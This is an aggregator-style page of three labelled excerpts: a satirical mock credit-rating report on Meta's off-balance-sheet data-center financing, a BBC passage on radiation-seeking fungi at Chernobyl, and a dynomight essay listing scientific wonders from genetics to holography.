This requires a narrow corridor of assumptions in which Meta simultaneously plans to use the facility for two decades and insists that no one can predict four years of corporate intention. From a credit standpoint, we are supportive. The assumptions that render the debt invisible are precisely what make it secure.
A harmony best described as collateralized cognitive dissonance.

Meta linkage. The economics are wedded to Meta’s credit profile, which we are required to describe as AA-/Stable rather than “the only reason this entire structure doesn’t fold from a stiff breeze.” Meta guarantees the rent, the RVG, and the continued relevance of the facility. The rest is décor auditors would deem “tasteful.”

Minimum rent floor. The lease schedule produces a perfectly flat DSCR of 1.12 through 2049. Projects of this size do not produce flat anything, but the model insists otherwise, so we pretend we believe it. Being sticklers for tradition, and having learned nothing from the financial crisis of 2008, we treat the spreadsheet as the final arbiter of truth, even when the inputs describe a world no one lives in.

Construction risk transfer. Meta absorbs cost overruns beyond 105 percent of budget and handles casualty repairs during construction. Our methodology interprets “contractually transferred” as “ceased to exist,” so we decline to model the risk of overruns on a $28 billion campus built in a hurricane corridor. This is considered best practice.

RVG backstop. The residual value guarantee eliminates tail risk in much the same way a parent cosigning for their teenager’s car loan eliminates tail risk: by ensuring that the person with all the money pays for everything. If the market value collapses, Meta pays the difference. If the facility can’t be sold, Meta pays the whole thing. If the entire campus becomes a raccoon sanctuary, Meta still pays. We classify this as credit protection, a nuanced designation that allows us to recognize the security of the arrangement without recognizing the debt.

Absence of performance KPIs. There are no operational KPIs that allow rent abatement. This is helpful because KPIs create volatility, and volatility requires thought, a variable we explicitly exclude from our methodology.
By removing KPIs entirely, the structure ensures a level of cash-flow stability that exists only in transactions where the tenant is also the economic owner pretending to be a squatter.

Key Risks We Have Chosen To Be Comfortable With

The rating also reflects several risks that are acknowledged, intellectually troubling, and ultimately tolerated because Meta is large enough that everyone agrees to stop asking questions.

Off-balance-sheet dependence. Meta treats JVCo as if it belongs to someone else, which is a generous interpretation of ownership. If consolidation rules ever evolve to reflect economic substance, Meta could be required to add $27 billion of assets and matching debt back onto its own balance sheet. Our methodology treats this as a theoretical inconvenience rather than a credit event, because calling it what it really is would create a conflict with the very companies we rate.

Concentration risk. The entire project exists for one tenant with one business model in one industry undergoing technological whiplash. The facility is engineered so specifically for Meta’s AI ambitions that the only plausible alternative tenant is another version of Meta from a parallel timeline. We strongly disagree with the many-worlds interpretation of quantum mechanics. We set this concern aside because at this stage in the transaction, the A+ rating is a structural load-bearing wall, and we are not paid to do demolition.

Residual value uncertainty. The RVG depends on modeled guaranteed minimum values that assume buyers will one day desire a vast hyperscale complex in Richland Parish under stress scenarios. If hyperscale supply balloons or the resale market for 2-gigawatt data centers becomes as illiquid as common sense, Meta will owe more money. This increases Meta’s direct obligations, which should concern us, but does not, because Meta is rated AA-/Stable and therefore presumed to withstand any scenario we have chosen not to model.

Casualty and force majeure.
In extreme scenarios, multiple buildings could be destroyed by a hurricane, which we view as unlikely given that they almost never impact Louisiana. The logic resembles a Rube Goldberg machine built out of indemnities. We classify this as a strength.

JV structural subordination. Cash flows must navigate waterfalls, covenants, carve-outs, and the possibility of up to $75 million of JV-level debt. These features introduce structural complexity, which we flag, then promptly ignore, because acknowledging it would force us to explain who benefits from the convolution.

Despite these risks, we maintain an A+ rating because Meta’s credit quality is strong, the structure is designed to hide risk rather than transfer it, and our role in this ecosystem is to observe these contradictions and proceed as though they were features rather than warnings.

The outlook is Superficially Stable. That means we expect the structure to hold together as long as Meta keeps paying for everything and the accounting rules remain generously uninterested in economic reality.

We assume, with the confidence of people who have clearly not been punished enough:

- Meta will preserve an AA-/Stable profile because any other outcome would force everyone involved to admit what this actually is.
- Construction will stay “broadly on schedule,” a phrase we use to pre-forgive whatever happens as long as Meta covers the overruns, which it must.
- Lease payments and the minimum rent schedule will continue producing a DSCR that hovers around 1.12 in models designed to ensure that result, and not materially below 1.10 unless something un-modeled happens, which we classify as “outside scope.”
- The RVG will remain enforceable, which matters more than the resale value of a hyperscale facility in a world where hyperscale facilities may or may not be worth anything.
- Changes in VIE or lease-accounting guidance will affect where Meta stores the debt, not whether Meta pays it.

We could lower the rating if Meta were downgraded, if DSCR sagged below the range we pretend is acceptable, if Meta weakened its guarantees, or if events unfold in ways our assumptions did not account for, as events tend to do. The last category includes anything that would force us to revisit the assumptions we confidently made without testing.

We view an upgrade as unlikely. The structure already performs the single miracle it was designed for: keeping $27.3 billion off Meta’s balance sheet in a manner we are professionally obligated to support.

CONFIDENTIALITY AND USE: This report is intended solely for institutional investors, entities required by compliance to review documents they will not read, and any regulatory body still pretending to monitor off-balance-sheet arrangements. FSG LLC makes no representation, warranty, or faint gesture toward coherence regarding the accuracy, completeness, or legitimacy of anything contained herein. By reading this document, you irrevocably acknowledge that we did not perform due diligence in any conventional, philosophical, or legally enforceable sense. Our review consisted of rereading Meta’s press release until repetition produced acceptance, aided by a Magic 8-Ball we shook until it agreed.

LIMITATION OF RELIANCE: Any resemblance to objective analysis is coincidental and should not be relied upon by anyone with fiduciary obligations, ethical standards, a working memory, or the ability to perform basic subtraction. Forward-looking statements are based on assumptions that will not survive contact with reality, stress testing, most Tuesdays, or a modest change in interest rates. FSG LLC is not liable for losses arising from reliance on this report, misunderstanding this report, fully understanding this report, or the sinking recognition that you should have known better.
Past performance is not indicative of future results, except in the specific case of rating agencies repeating the same mistakes at larger scales with increasing confidence.

RATING METHODOLOGY: The rating assigned herein may be revised, withdrawn, or denied ever existing if Meta consolidates the debt, Louisiana ceases to exist for tax purposes, or the data center becomes self-aware and moves to Montana to escape the heat. FSG LLC calculated the A+ rating using a proprietary model consisting of discounted cash flows, interpretive dance, and whatever number Meta’s CFO sounded comfortable with on a diligence call we did not in fact attend. Readers who discover material errors in this report are contractually obligated to keep them to themselves and accept that being technically correct is the least valuable form of correct.

GENERAL PROVISIONS: By continuing to read, you consent to the proposition that what Meta does not consolidate does not exist, waive your right to say “I told you so” when this unravels, and accept that the term “investment grade” is now a disposition rather than a metric. FSG LLC reserves the right to amend, retract, deny, or disown this report at any time, particularly if Congress shows interest or someone notes that $27 billion off-balance-sheet is on a balance sheet somewhere. If you print this document, you may be required under applicable securities law to recycle it, shred it, or burn it before sunrise, whichever comes first. For questions, complaints, or sneaking suspicions, please do not contact us. We are unavailable indefinitely and have disabled our voicemail.
...
Read the original on stohl.substack.com »
The mould — formed from a number of different fungi — seemed to be doing something remarkable. It hadn’t just moved in because workers at the plant had left. Instead, Zhdanova had found in previous surveys of soil around Chernobyl that the fungi were actually growing towards the radioactive particles that littered the area. Now, she found that they had reached into the original source of the radiation, the rooms within the exploded reactor building.
Though each survey took her close to harmful radiation, Zhdanova’s work has also overturned our ideas about how radiation impacts life on Earth. Now her discovery offers hope of cleaning up radioactive sites, and may even provide ways of protecting astronauts from harmful radiation as they travel into space.
Eleven years before Zhdanova’s visit, a routine safety test of reactor four at the Chernobyl Nuclear Power Plant had quickly turned into the world’s worst nuclear accident. A series of errors both in the design of the reactor and its operation led to a huge explosion in the early hours of 26 April 1986. The result was a single, massive release of radionuclides. Radioactive iodine was a leading cause of death in the first days and weeks, and, later, of cancer.
In an attempt to reduce the risk of radiation poisoning and long-term health complications, a 30km (19 mile) exclusion zone — also known as the “zone of alienation” — was established to keep people at a distance from the worst of the radioactive remains of reactor four.
But while humans were kept away, Zhdanova’s black mould had slowly colonised the area.
...
Read the original on www.bbc.com »
That if you’re a life form and you cook up a baby and copy your genes to them, you’ll find that the genes have been degraded due to oxidative stress et al., which isn’t cause for celebration, but if you find some other hopefully-hot person and randomly swap in half of their genes, your baby will still be somewhat less fit compared to you and your hopefully-hot friend on average, but now there is variance, so if you cook up several babies, one of them might be as fit or even fitter than you, and that one will likely have more babies than your other babies have, and thus complex life can persist in a universe with increasing entropy.
That if we wanted to, we surely could figure out which of the 300-ish strains of rhinovirus are circulating in a given area at a given time and rapidly vaccinate people to stop it and thereby finally “cure” the common cold, and though this is too annoying to pursue right now, it seems like it’s just a matter of time.
That if you look back at history, you see that plagues went from Europe to the Americas but not the other way, which suggests that urbanization and travel are great allies for infectious disease, and these both continue today but are held in check by sanitation and vaccines even while we have lots of tricks like UVC light and high-frequency sound and air filtration and waste monitoring and paying people to stay home that we’ve barely even put in play.
That while engineered infectious diseases loom ever-larger as a potential very big problem, we also have lots of crazier tricks we could pull out like panopticon viral screening or toilet monitors or daily individualized saliva sampling or engineered microbe-resistant surfaces or even dividing society into cells with rotating interlocks or having people walk around in little personal spacesuits, and while admittedly most of this doesn’t sound awesome, I see no reason this shouldn’t be a battle that we would win.
That radioactive atoms either release a ton of energy but also quickly stop existing—a gram of Rubidium-90 scattered around your kitchen emits as much energy as ~200,000 incandescent lightbulbs but after an hour only 0.000000113g is left—or don’t put out very much energy but keep existing for a long time—a gram of Carbon-14 only puts out the equivalent of 0.0000212 light bulbs but if you start with a gram, you’ll still have 0.999879g after a year—so it isn’t actually that easy to permanently poison the environment with radiation although Cobalt-60 with its medium energy output and medium half-life is unfortunate, medical applications notwithstanding I still wish Cobalt-60 didn’t exist, screw you Cobalt-60.
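The tradeoff in that item is plain exponential decay: remaining mass is m₀ · 0.5^(t / half-life). A quick sketch, using half-life figures from memory (roughly 158 seconds for Rubidium-90 and 5,730 years for Carbon-14, so treat them as approximate):

```python
# Exponential decay: remaining = m0 * 0.5 ** (t / half_life).
# Half-lives from memory (approximate): Rb-90 ~158 s, C-14 ~5730 years.

def remaining(m0_grams: float, half_life: float, elapsed: float) -> float:
    """Mass left after `elapsed` time, in the same units as `half_life`."""
    return m0_grams * 0.5 ** (elapsed / half_life)

# One gram of Rb-90 after an hour (half-life in seconds, so t = 3600 s):
rb90 = remaining(1.0, 158, 3600)   # on the order of 1e-7 g left

# One gram of C-14 after a year (half-life in years, so t = 1):
c14 = remaining(1.0, 5730, 1)      # ~0.999879 g left

print(f"Rb-90 after 1 h: {rb90:.3e} g;  C-14 after 1 yr: {c14:.6f} g")
```

The numbers reproduce the post's figures to within rounding: the short-half-life isotope is nearly gone within an hour, while the long-half-life one barely notices a year.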
That while curing all cancer would only increase life expectancy by ~3 years and curing all heart disease would only increase life expectancy by ~3 years, and preventing all accidents would only increase life expectancy by ~1.5 years, if we did all of these at the same time and then a lot of other stuff too, eventually the effects would go nonlinear, so trying to cure cancer isn’t actually a waste of time, thankfully.
That sleep, that probably evolution first made a low-energy mode so we don’t starve so fast and then layered on some maintenance processes, but the effect is that we live in a cycle and when things aren’t going your way it’s comforting that reality doesn’t stretch out before you indefinitely but instead you can look forward to a reset and a pause that’s somehow neither experienced nor skipped.
That every expression graph built from differentiable elementary functions and producing a scalar output has a gradient that can itself be written as an expression graph, and furthermore that the latter expression graph is always the same size as the first one and is easy to find, and thus that it’s possible to fit very large expression graphs to data.
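That fact is the heart of reverse-mode automatic differentiation: every elementary operation has a known local derivative, so the gradient can be accumulated by one backward sweep over the same graph. A toy sketch for scalar graphs (path-wise recursion, so it is correct but inefficient on graphs with heavy sharing, nothing like a real autodiff library):

```python
# Minimal reverse-mode autodiff over scalar expression graphs: each node
# records its inputs with their local derivatives, and backward() sweeps
# the graph once, so gradient work is proportional to forward work.

class Var:
    def __init__(self, value, parents=()):
        self.value = value
        self.parents = parents  # pairs of (input Var, local derivative)
        self.grad = 0.0

    def __add__(self, other):
        return Var(self.value + other.value, [(self, 1.0), (other, 1.0)])

    def __mul__(self, other):
        return Var(self.value * other.value,
                   [(self, other.value), (other, self.value)])

    def backward(self, seed=1.0):
        # Accumulate the seed gradient, then push it to each input
        # scaled by that input's local derivative (the chain rule).
        self.grad += seed
        for parent, local in self.parents:
            parent.backward(seed * local)

# f(x, y) = x*y + x, so df/dx = y + 1 and df/dy = x.
x, y = Var(3.0), Var(4.0)
f = x * y + x
f.backward()
print(f.value, x.grad, y.grad)  # → 15.0 5.0 3.0
```

Fitting "very large expression graphs to data" is then just running this sweep over a loss node and nudging the inputs against their gradients.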
That if you look at something and move your head around, you observe the entire light field, which is a five-dimensional function of three spatial coordinates and two angles, and yet if you do something fancy with lasers, somehow that entire light field can be stored on a single piece of normal two-dimensional film and then replayed later.
That, as far as I can tell, the reason five-dimensional light fields can be stored on two-dimensional film simply cannot be explained without quite a lot of wave mechanics, a vivid example of the strangeness of this place and proof that all those physicists with their diffractions and phase conjugations really are up to something.
That if you were in two dimensions and you tried to eat something then maybe your body would split into two pieces since the whole path from mouth to anus would have to be disconnected, so be thankful you’re in three dimensions, although maybe you could have some kind of jigsaw-shaped digestive tract so your two pieces would only jiggle around or maybe you could use the same orifice for both purposes, remember that if you ever find yourself in two dimensions, I guess.
...
Read the original on dynomight.net »